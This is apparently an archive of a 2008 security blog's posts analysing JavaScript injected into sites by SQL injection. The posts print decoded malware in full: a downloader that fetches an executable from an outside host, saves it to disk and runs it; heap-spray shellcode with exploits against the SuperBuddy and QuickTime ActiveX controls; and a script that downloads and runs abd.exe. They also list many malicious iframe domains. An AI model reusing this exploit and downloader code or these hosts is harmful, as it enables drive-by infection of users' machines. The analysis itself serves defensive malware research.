Archive for June, 2008

www.qq117cc.cn/k.js

Posted in sql injection on June 28, 2008 by s3cu

This injected JS contains iframe from 456.htm and dj.htm as well as dvb.bnmfg.com.cn/bnmfg/aa.htm?11

456.htm loads malicious swf files.

dj.htm loads exploits from http://www.heiheinn.cn

The iframe dvb.bnmfg.com.cn/bnmfg/aa.htm?11 downloads a bunch of other exploits targeting realplayer, flashplayer and others

www.westpacsecuresite.com/b.js

Posted in sql injection on June 25, 2008 by s3cu

This sql injected URL will call hidden iframe from http://bios47.com/cgi-bin/index.cgi?ad
bios47.com uses obfuscated scripts same as those in apps84.com

www.update34.com/b.js

Posted in sql injection on June 25, 2008 by s3cu

This new injected domain will call hidden iframe from http://apps84.com/cgi-bin/index.cgi?ad

index.cgi?ad is an obfuscated JS, which successfully decoded will depending on the browser version and language setting, download code from http://apps84.com/cgi-bin/index.cgi?ffd34c3e0100f0600077e0ed58060000000002b7b2ae43ff%5Bcode]

Interestingly, the code downloaded is another obfuscated javascript. Using the same method of decoding, results in this code

function q37Qot3M(C9a5yGFZ)
{
	var qPjQyRih = "abcdefghiklmnopqrstuvwxyz0123456789";
	var Z4mYjfqe = '';
	for (var ayDbH97x=0; ayDbH97x<C9a5yGFZ; ayDbH97x++) {
		var UxA8KpPP = Math.floor(Math.random() * qPjQyRih.length);
		Z4mYjfqe += qPjQyRih.substring(UxA8KpPP, UxA8KpPP+1);
	}

	return Z4mYjfqe;
}

function rRr2voNt(gqzRhsXa, zDW_Nrnc)
{
	var UqeZTIIs = null;
	var ewf9BHSL = 'UqeZTIIs=gqzRhsXa.';
	var pb4SCZne = new Array(
		'CreateObject(zDW_Nrnc)',
		'CreateObject(zDW_Nrnc, "")',
		'CreateObject(zDW_Nrnc, "", "")',
		'GetObject("", zDW_Nrnc)',
		'GetObject(zDW_Nrnc, "")',
		'GetObject(zDW_Nrnc)'
	);

	var ibygzrSi=0;

	while(!UqeZTIIs && ibygzrSi < pb4SCZne.length) {
		try {
			eval(ewf9BHSL+pb4SCZne[ibygzrSi]);
		} catch(e) { }

		ibygzrSi++;
	}
	
	return UqeZTIIs;
}

function EQnpdJ3R(rDx3Y3YK, nmg1Ya8Z)
{

	try {
		rDx3Y3YK.open("GET", nmg1Ya8Z, false);
		rDx3Y3YK.send(null);

	} catch(e) { return 0; }

	return rDx3Y3YK.responseBody;
}


function iFzeRt3v(kJVv5iSV, GGib1Bbs, nlpYQQkD)
{

	try {
		kJVv5iSV.Type = 1;
		kJVv5iSV.Mode = 3;
		kJVv5iSV.Open();
		kJVv5iSV.Write(nlpYQQkD);
		kJVv5iSV.SaveToFile(GGib1Bbs, 2);
		kJVv5iSV.Close();
	} catch(e) { return 0; }

	return 1;
}

function l8NTJVdS(fjt4aEGK, rDx3Y3YK, kJVv5iSV, f8ooKsQo, GFWQLQNh)
{
	var ybDUybhC = 0;
	var HgFYBJZD = EQnpdJ3R(rDx3Y3YK, fjt4aEGK);

	if (HgFYBJZD != 0) {
		var lJ99WYEL = "c:\\"+q37Qot3M(6)+".exe";

		if (iFzeRt3v(kJVv5iSV, lJ99WYEL, HgFYBJZD) == 1) {
			if (GFWQLQNh == 0) {
				try {
					f8ooKsQo.Run(lJ99WYEL, 0);
					ybDUybhC = 1;
				} catch(e) { }
			} else {
				try {
					f8ooKsQo.ShellExecute(lJ99WYEL, "", "", "open", 0);
					ybDUybhC = 1;
				} catch(e) { }
			}
		}
	}

	return ybDUybhC;
}

function GpU6LOfo()
{
	var rEoXWlfi = 0;
	var bc_CUBHX = 1;
	var VGCo6zkO = "http://apps84.com/cgi-bin/index.cgi?ff4a457c0100f0600277e0ed58060000000002b72ba2710001040900000000020";
	var kf4nCFPY = new Array(null, null, null);

	try {
		var nAn0J9zC = 0;
		var rv9jQ4yP = document.createElement("object");
		rv9jQ4yP.setAttribute("classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");

		if (rv9jQ4yP) {
			kf4nCFPY[0] = rRr2voNt(rv9jQ4yP, "msxml2.XMLHTTP");
			if (!kf4nCFPY[0])
				kf4nCFPY[0] = rRr2voNt(rv9jQ4yP, "Microsoft.XMLHTTP");
			
			if (!kf4nCFPY[0])
				kf4nCFPY[0] = rRr2voNt(rv9jQ4yP, "MSXML2.ServerXMLHTTP");

			kf4nCFPY[1] = rRr2voNt(rv9jQ4yP, "ADODB.Stream");

			kf4nCFPY[2] = rRr2voNt(rv9jQ4yP, "WScript.Shell");

			if (!kf4nCFPY[2]) {
				kf4nCFPY[2] = rRr2voNt(rv9jQ4yP, "Shell.Application");
				if (kf4nCFPY[2]) nAn0J9zC = 1;
			}
		}

		if (kf4nCFPY[0] && kf4nCFPY[1] && kf4nCFPY[2]) {
			for(var ELxcGHTj=0;ELxcGHTj<bc_CUBHX;ELxcGHTj++) {
				var GH3tzsho = l8NTJVdS(VGCo6zkO+ELxcGHTj.toString(), kf4nCFPY[0], kf4nCFPY[1], kf4nCFPY[2], nAn0J9zC);

				if (!rEoXWlfi)
					rEoXWlfi = GH3tzsho;
			}
		}

	} catch(e) {}

	return rEoXWlfi;
}

function z15QLzDF(NpTt78SK, vyRa5Vhw)
{
	try {

		var bcUSP1AU = new Date();
		bcUSP1AU.setDate(bcUSP1AU.getDate() + 120000);

		if (NpTt78SK) {
			document.cookie =
				"id=" + NpTt78SK +
				"; path=/" +
				"; expires=" + bcUSP1AU.toGMTString();
		}

		if (vyRa5Vhw) {
			document.cookie =
				"addt=" + vyRa5Vhw +
				"; path=/" +
				"; expires=" + bcUSP1AU.toGMTString();
		}


	} catch(e) {
	}
}

var lajutPnm = new Array();
var xnyWSACx = 0;

function t02H59nf()
{
	lajutPnm = lajutPnm;
	setTimeout(t02H59nf, 100);
}

function wuWdTHTE(qXNjDqmd, aDNIjIpy)
{
	while (qXNjDqmd.length*2<aDNIjIpy)
		qXNjDqmd += qXNjDqmd;

	qXNjDqmd = qXNjDqmd.substring(0,aDNIjIpy/2);
	return qXNjDqmd;
}

function S3czSfbD()
{
	if (!xnyWSACx) {
		var V2dJq4HP = 0x0c0c0c0c;
		var qsNDyV7P = unescape("%u00e8%u0000%u5d00%uc583%ub914%u018d%u0000%ue4b0%u4530%u4500%u7549%uebf9%u7400%u7474%u7474%u7474%u0d74%ue418%ue4e4%u80bb%ud445%ue4e4%u9ce4%u6fe8%ue8a4%u946f%u49f8%u8c6f%u0fec%u6fed%ud0a4%ua469%u6f98%ud88c%u136f%ue08e%u0cbd%ue46b%ue4e4%u1d06%u8b8c%ue48a%u8ce4%u9691%u8988%u1bb0%u6ff2%u0c0c%ue49d%ue4e4%u336f%u64a3%ue4db%u1e91%ub3a3%u64a3%ue4db%u1e91%u0b6f%ud7bb%u652d%ue008%ue4e5%u6fe4%ub538%ub7b6%ue08c%ue4e5%u1be4%ue8b2%ubdbe%ub6b5%ue66f%ua7b7%udf64%u91e4%u651e%u189f%u81ca%u819c%ue791%u0f67%u6dec%u23e7%ue0a7%u81ca%u819c%ua722%ue4ec%u6ebf%ue025%u6cd4%ue4a1%u24d7%ub4b4%ub3b7%u1bb4%uf4b2%u1c67%u91e4%u8ee2%ub7e5%ub21b%ubee0%u67bd%ue026%u64a5%ue4de%u5091%ub21b%ub5ec%u6fb2%ud891%u906f%u9cca%u11e7%u6fb2%uc492%u11e7%u2dd7%ua5ad%ue749%ud721%ueb3f%uf45a%u32de%uec90%u2f25%ue7e9%ua43e%u150f%ufbdf%u0391%u6fba%uc0ba%u39e7%u6f82%uafe8%uba6f%ue7f8%u6f39%u6fe0%u21e7%uba4f%u27bd%u1b0c%u1b1a%u6a1b%ueaaa%u7c08%u6e1a%u9aea%u063c%ud797%u6e2e%ud2bf%ucbfe%u9494%u8c83%ue4a3%u908c%u9490%ucbde%u85cb%u9494%udc97%ucad0%u8b87%ucb89%u8387%uc98d%u8d86%ucb8a%u8a8d%u8180%uca9c%u8387%udb8d%u8282%u85d0%ud1d0%u87d3%ud5d4%ud4d4%ud482%ud4d2%ud6d4%ud3d3%ud481%u8081%udcd1%ud2d4%ud4d4%ud4d4%ud4d4%ud4d4%ud6d4%ud386%u86d6%ud685%ud5d3%ud4d4%ud5d4%ud0d4%uddd4%ud4d4%ud4d4%ud4d4%ud4d4%udcd4%ue4d4");
		var yuVqerxP = 0x400000;
		var FDatJxfq = qsNDyV7P.length * 2;
		var aDNIjIpy = yuVqerxP - (FDatJxfq+0x38);
		var qXNjDqmd = unescape("%u0c0c%u0c0c");

		qXNjDqmd = wuWdTHTE(qXNjDqmd,aDNIjIpy);
		var NGNogBza = (V2dJq4HP - 0x400000)/yuVqerxP;
	
		for (var U4Dn_RUx=0;U4Dn_RUx<NGNogBza;U4Dn_RUx++) {
			lajutPnm[U4Dn_RUx] = qXNjDqmd + qsNDyV7P;
		}

		xnyWSACx = 1;
		t02H59nf();
	}


	return 0;
}

function JgIeEAxw() {

	try {
		var YNu_L1Ip = new ActiveXObject('Sb.SuperBuddy');

		if (YNu_L1Ip) {
			S3czSfbD();
			z15QLzDF(9);
			YNu_L1Ip.LinkSBIcons(0x0c0c0c0c);
		}
	} catch(e) {
	}

	return 0;
}

function zmpCkFBI()
{
	try {
		var plv4KWFi = new ActiveXObject("QuickTime.QuickTime.4");

		if (plv4KWFi) {
			S3czSfbD();
			var mk84Pufq = "";
			for(var Zxae7BbE=0;Zxae7BbE<200;Zxae7BbE++) {
				mk84Pufq += "AAAA";
			}

			mk84Pufq += "AAA";

			for(var Zxae7BbE=0;Zxae7BbE<3;Zxae7BbE++) {
				mk84Pufq += "\x0c\x0c\x0c\x0c";
			}

			var Et27CeXt =
				'' +
				'' +
				'' +
				'' +
				'<param name="qtnext1" value="T">' +
				'' +
				'';

			gAqc_6tX = 0;
			var eBUg1ask = document.createElement("div");
			eBUg1ask.innerHTML = Et27CeXt;
			z15QLzDF(6);
			document.body.appendChild(eBUg1ask);

		}
	} catch(e) {
	}

	return 0;
}
if (GpU6LOfo() || JgIeEAxw() || zmpCkFBI()
) {
	document.XQYxMigz = 'about:blank';
} else {
	document.XQYxMigz = 'about:blank';
}

/*setTimeout(function() {
	if (document.gAqc_6tX && document.mEWDIx_N && document.Z4lSVtbt) {
		setTimeout("window.location = '" + document.XQYxMigz + "';", 1000);
	} else {
		setTimeout(arguments.callee, 1000);
	}
}, 1000);*/

www.j8j8hei.cn/k.js

Posted in sql injection on June 22, 2008 by s3cu

A new SQL injected JS.
It will call iframes from http://www.kiiss117.cn/456.htm and http://www.kiiss117.cn/dj.htm
dj.htm exploits vulnerabilities by calling iframes from http://www.heiheinn.cn/14.htm , real.htm and new.htm

my.stsw5178.cn/1.js

Posted in sql injection on June 12, 2008 by s3cu

Content of this JS

window.status = "完毕";
document.write("<iframe src=http://c.liuliang000.com/wending09.htm width=2 height=2></iframe>");

Content of wending09.htm

<iframe src=main.htm width=10 height=0></iframe>
<script language="javascript" type="text/javascript" src="http://js.users.51.la/1937043.js"></script>

The decoded JS content for main.htm is
try{var e;var ado=(document.createElement("object"));if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");var as=ado.createobject("Adodb.Stream","")}catch(e){};finally{if(e!="[object Error]"){var a="%dfdf%%D$F^D%SF&DS";document.write("<script src=014.js><\/script>")}else{try{var f;var Flashver=(new ActiveXObject("ShockwaveFlash.ShockwaveFlash.9")).GetVariable("$version").split(",")}catch(f){};finally{if(f!="[object Error]"&&Flashver[2]!="124"&&Flashver[2]!="60"){document.write('<embed src="http://swf.4w4w4w.com/swf/'+Flashver[2]+'.swf"></embed>')}}try{var g;var glworld=new ActiveXObject("\x47\x4c\x49\x45\x44\x6f\x77\x6e\x2e\x49\x45\x44\x6f\x77\x6e\x2e\x31")}catch(g){};finally{if(g!="[object Error]"){document.write('<iframe style=display:none src="lz.htm"></iframe>')}}try{var h;var real=new ActiveXObject("IERPCtl.IERPCtl.1")}catch(h){};finally{if(h!="[object Error]"){if(new ActiveXObject("IERPCtl.IERPCtl.1").PlayerProperty("PRODUCTVERSION")<="6.0.14.552"){document.write('<sCrIpT LAnGuAgE="jAvAsCrIpT" src=rl.js><\/script>')}}}try{var i;var Baidu=new ActiveXObject("BaiduBar.Tool")}catch(i){};finally{if(i!="[object Error]"){Baidu["\x44\x6c\x6f\x61\x64\x44\x53"]("http://xia.9w9w9w.com/down/abd.cab","abd.exe",0)}}}}
As can be seen some of the exploits are downloaded from

www.fengnima.cn/k.js

Posted in sql injection on June 12, 2008 by s3cu

The content of this JS is similar to the others, basically calling exploits using iframes to

www.killpp.cn/k.js

Posted in sql injection on June 9, 2008 by s3cu

The content of this script calls 2 iframe:

http://www.qiqicc.cn/dj.htm calls the following iframe

http://www.killpp.cn/456.htm embeds these 2 flash: 4561.swf and 4562.swf

The swf files downloads 2 other swf files (based on flash player version): WIN%209,0,115,0i.swf and WIN%209,0,115,0f.swf

Virustotal result of WIN%209,0,115,0f.swf

Virustotal result of WIN%209,0,115,0i.swf

www.bannerupd.com/b.js

Posted in sql injection on June 9, 2008 by s3cu

this injected domain iframes to http://err68.com/cgi-bin/index.cgi?ad

new sql injected domains

Posted in sql injection on June 5, 2008 by s3cu

http://www.encode72.com/b.js

window.status="";
var cookieString = document.cookie;
var start = cookieString.indexOf("bannerupdate=");
if (start != -1)
{}else{
var expires = new Date();
expires.setTime(expires.getTime()+24*1*60*60*1000);
document.cookie = "bannerupdate=update;expires=" + expires.toGMTString();
try{
document.write("<iframe src=http://err68.com/cgi-bin/index.cgi?ad width=0 height
=0 frameborder=0></iframe>");
window.open("http://topsoftwaresale.com",'soft',"toolbar=no,location=no,director
ies=no,status=no,menubar=no,scrollbars=no,resizable=no,width=1015,height=600,top
=10,left=10");
}
catch(e)
{
};
}

As can be seen from the content it opens a website topsoftwaresale.com. but embedded is an iframe from err68.com/cgi-bin/index.cgi?ad
The content of the iframe how to decode it can be seen here.

Similar to the injected domain above, the others are as follows:
http://www.tag58.com/b.js -> encode72.com/cgi-bin/index.cgi?ad
http://www.win496.com/b.js -> exec51.com/cgi-bin/index.cgi?ad
http://www.exe94.com/b.js -> err68.com/cgi-bin/index.cgi?ad
http://www.view89.com/b.js -> err68.com/cgi-bin/index.cgi?ad
http://www.rundll841.com/b.js -> win496.com/cgi-bin/index.cgi?ad
err68.com/b.js -> win496.com/cgi-bin/index.cgi?ad
exec51.com/b.js -> err68.com/cgi-bin/index.cgi?ad

o7n9.cn/a.js

Posted in sql injection on June 3, 2008 by s3cu

content of a.js essentially iframes to 456.htm

window.status="";
var cookieString = document.cookie;
var start = cookieString.indexOf("0wen0wen=");
if (start != -1)
{}
else
{
var expires = new Date();
expires.setTime(expires.getTime() +  24 * 1 * 60 * 60 * 1000);
document.cookie = "0wen0wen=funny;expires=" + expires.toGMTString();
try{
document.write("<iframe width=10 height=10 src=http://o7n9.cn/456.htm></iframe>");
}
catch(e)
{
};

content of 456.htm retrieves 2 SWF files 4561.swf and 4562.swf

swfdump -D 4561.swf
[HEADER]        File version: 8
[HEADER]        File is zlib compressed. Ratio: 96%
[HEADER]        File size: 164 (Depacked)
[HEADER]        Frame rate: 12.000000
[HEADER]        Frame count: 1
[HEADER]        Movie width: 550.00
[HEADER]        Movie height: 400.00
[045]         4 FILEATTRIBUTES
[009]         3 SETBACKGROUNDCOLOR (ff/ff/ff)
[018]        31 PROTECT
[00c]        89 DOACTION
(   50 bytes) action: Constantpool(5 entries) String:"fVersion" String:"/:$version" String:"http://o7n9.cn/" String:"i.swf" String:"_root"
(    4 bytes) action: Push Lookup:0 ("fVersion") Lookup:1 ("/:$version")
(    0 bytes) action: GetVariable
(    0 bytes) action: DefineLocal
(    4 bytes) action: Push Lookup:2 ("http://o7n9.cn/") Lookup:0 ("fVersion")
(    0 bytes) action: GetVariable
(    0 bytes) action: Add2
(    2 bytes) action: Push Lookup:3 ("i.swf")
(    0 bytes) action: Add2
(    2 bytes) action: Push Lookup:4 ("_root")
(    0 bytes) action: GetVariable
(    1 bytes) action: GetUrl2 64
(    0 bytes) action: Stop
(    0 bytes) action: End
[001]         0 SHOWFRAME 1 (00:00:00,000)
[000]         0 END

So the 2 SWF files retrieves flash exploits by using the player version as part of the filename.

Follow

Get every new post delivered to your Inbox.